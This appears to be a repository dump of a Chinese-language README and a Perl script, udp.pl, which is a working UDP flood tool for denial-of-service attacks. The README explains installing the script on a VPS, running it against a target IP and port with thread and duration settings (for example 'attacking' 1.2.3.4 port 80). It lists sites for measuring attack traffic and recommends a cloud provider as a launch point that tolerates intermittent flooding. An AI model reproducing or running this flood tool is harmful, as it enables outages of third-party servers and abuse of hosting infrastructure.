├── README.md └── udp.pl /README.md: -------------------------------------------------------------------------------- 1 | # [ALP本机发包脚本使用方法说明](https://www.beggar.tk/9.html) 2 | 3 | > 作者: [Laowang](https://www.beggar.tk/author/1/) 4 | > 5 | > 时间: 2019-10-12 6 | > 7 | > 分类: [默认分类](https://www.beggar.tk/category/default/) 8 | 9 | 本机发包脚本使用方法说明. 10 | 11 | 登陆VPS,执行命令 12 | 13 | CentOS: 14 | 15 | ```bash 16 | yum update -y 17 | yum install wget perl dstat -y 18 | wget https://raw.githubusercontent.com/whunt1/ALP_Script/master/udp.pl 19 | ``` 20 | 21 | Debian & Ubuntu: 22 | 23 | ```bash 24 | apt-get update -y 25 | apt-get install wget perl dstat -y 26 | wget https://raw.githubusercontent.com/whunt1/ALP_Script/master/udp.pl 27 | ``` 28 | 29 | 执行命令:`perl udp.pl IP port thread time(s).` 30 | 31 | 如要攻击1.2.3.4,80端口攻击100秒 32 | 33 | `perl udp.pl 1.2.3.4 80 200 100` 34 | 35 | 这里的200是线程,根据VPS网络性能自己决定. 36 | 37 | 监控网络状况可以输入 `dstat` 查看. 38 | 39 | 要查看打出多少流量,可以访问下面几个测量的墙. 40 | 41 | ## 测量网站 42 | 43 | [vedbex]( https://www.vedbex.com/tools/dstat ) 44 | 45 | [ddosfilter]( http://ddosfilter.net/layer4.php ) 46 | 47 | [cyber-hub](https://cyber-hub.net/layer4.php) 48 | 49 | [toolsmania](https://www.toolsmania.net/dstat_layer4.php) 50 | 51 | [dstat.live](https://dstat.live/) 52 | 53 | [dstat.cc](https://dstat.cc/l4.php) 54 | 55 | 什么?不知道用那里的机器发包? 56 | 57 | scaleway online旗下的 只要你别一直打 基本没事. 58 | 59 | [scaleway官网](https://www.scaleway.com/) 60 | 61 | 标签: none 62 | -------------------------------------------------------------------------------- /udp.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl 2 | 3 | use Socket; 4 | use strict; 5 | 6 | my ($ip,$port,$Thread,$time) = @ARGV; 7 | 8 | my ($iaddr,$endtime,$pThread,$pport); 9 | 10 | $iaddr = inet_aton("$ip") or die "Cannot resolve hostname $ip\n"; 11 | $endtime = time() + ($time ? $time : 100); 12 | socket(flood, PF_INET, SOCK_DGRAM, 17); 13 | 14 | 15 | print "ATTACK HAS SENT TO $ip " . ($port ? $port : "random") . 16 | ($time ? " for $time seconds" : "") . "\n"; 17 | print "Break with Ctrl-C\n" unless $time; 18 | 19 | for (;time() <= $endtime;) { 20 | $pThread = $Thread ? $Thread : int(rand(1024-64)+64) ; 21 | $pport = $port ? $port : int(rand(1500000))+1; 22 | 23 | send(flood, pack("a$pThread","flood"), 0, pack_sockaddr_in($pport, $iaddr));} --------------------------------------------------------------------------------